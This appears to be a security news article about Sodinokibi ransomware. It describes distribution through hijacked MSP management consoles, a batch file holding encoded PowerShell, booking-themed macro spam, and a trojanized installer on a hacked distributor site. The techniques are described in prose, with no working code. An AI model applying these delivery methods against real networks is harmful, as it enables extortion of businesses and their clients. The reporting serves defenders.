GandCrab Ransomware’s operation is now shutting down. Malware developers are now finding other ways to scam people via ransomware. A newcomer named Sodinokibi Ransomware whose affiliates are using a wide range of tactics to distribute, scam and earn money.
Now, they have a new wave of attacks that involves hacking legitimate sites and replacing files with Sodinokibi laced files, hacking into Managed Service Providers (MSP’s) to push them to all their managed endpoints. Last but not the least they utilize spam campaigns for a wider reach.
Bottom line is once this gets ran into your system, your file gets encrypted and you’d read find ransom note asking you to pay before you get things back.
There are three recent campaigns found in the wild to gain wider distribution of the ransomware thus getting more payments.
Primarily, they are targeting Managed Service Provider (MSP’s).
Previous attacks done by GandCrab affiliates have targeted MSP’s. It has been found that Sodinokibi ransomware has been circulated via MSP’s. They have done it by reportedly accessing the networks via Remote Desktop Services and then utilizing their own management console to push ransomware installers to end points that they manage.
Kyle Hanslovan, the CEO of MSP security provider Huntress Labs, told BleepingComputer that one of the attacks against a large MSP appears to have been through their Webroot Management Console.
“On Wednesday, June 19th, we were notified by a large MSP they had a ransomware related incident. They believed this incident was initiated via their Webroot management console. This large MSP has not engaged with Huntress for forensic or incident response assistance.
This morning, one of the MSPs clients contacted BleepingComputer to share indicators to help the larger community. This client did not have Kaseya VSA in their network and only their Webroot hosts were encrypted. They exported the logs from their Webroot Management Console which confirmed PowerShell based payloads were tasked to run against 67 hosts. The PowerShell would download and execute an additional payload that was stored on Pastebin. We were not able to recover the Pastebin payload as it was already removed.”
PowerShell command shows a lot are being pushed to all of the end points.
Webroot already emailed customers to tell them that they have logged everyone out of their Webroot Management Consoles and enabled mandatory 2FA.
According to Hanslovan, a second attack appeared to have used the MSP’s Kaseya VSA console to push a file called 1488.bat to end points and execute it. Once executed, it would install the ransomware.
Security researchers have gotten a hold of the 1488.bat file and they are still analyzing them trying to find out more. It has been used to target a lot of MSP’s and some have been compromised.
Security team of BleepingComputer was able to gain access of the 1488.bat batch file and they figured out that it has a base64 encoded PowerShell command that decodes a bunch of scripts. Once ran, it will download and execute the script which includes the base64 encoded Sodinokibi installer.
Besides Kaseya and Webroot Management Console, ConnectWise Control is the third MSP that got hacked and used to push ransomware. One instance is where ConnectWise Control was used to install the ransomware and was able to hit 200 hosts successfully.
Spam campaigns are also being used to distribute. Website Booking.com is one good example. A new spam campaign was discovered by security researcher TG Soft that pretends to be a “New Booking” on Booking.com.
Users will get an email with word document attachment which has names similar to “Booking.com – 1571165841.doc”. One you open the file, it asks you to “Enable Content” in order to access the booking information.
However, enabling the content will run embedded macros that will run Sodinokibi from a remote site and execute it.
Another website that was found hacked was from a Winrar Italy distributor (www.winrar.it). It is pretty clever to target legitimate sites and replace installers from those compromised websites. Unfortunately, in this case. They were able to do so
The distributor has already been contacted about the ransomware file and as of this writing, their website has been taken down while they are resolving the issue. As per WinRARr GmbH regarding the attack who stated:
“The website which has been hacked is the website www.winrar.it/, which is run by our Italian distributor. It is not our website, but the one of our distributor and it has been victim of a hacker attack.”